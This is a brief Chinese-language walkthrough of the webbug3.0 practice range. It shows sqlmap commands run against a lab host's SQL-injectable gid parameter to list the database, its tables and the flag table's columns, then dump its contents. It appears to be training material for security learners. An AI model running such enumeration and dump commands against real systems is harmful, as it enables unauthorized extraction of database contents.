webbug3.0靶场
webbug3.0靶场
目标一,由于用的kli系统,所以没有去手动注入,用了sqlmap来注入检测
先用sqlmap -u “http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1” –current-db查看当前数据库得到数据库pentesterlab
然后查看当前数据库的表sqlmap -u “http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1” -D pentesterlab –table
一看这个flag表就知道肯定是它了
用sqlmap -u “http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1” -D pentesterlab -T flag –columns 看一下表里面的字段
看到有两个字段flag和id,直接暴flag字段内容
sqlmap -u “http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1” -D pentesterlab -T flag -C flag –dump –batch
(–batch自动化不询问,–dump把结果导出)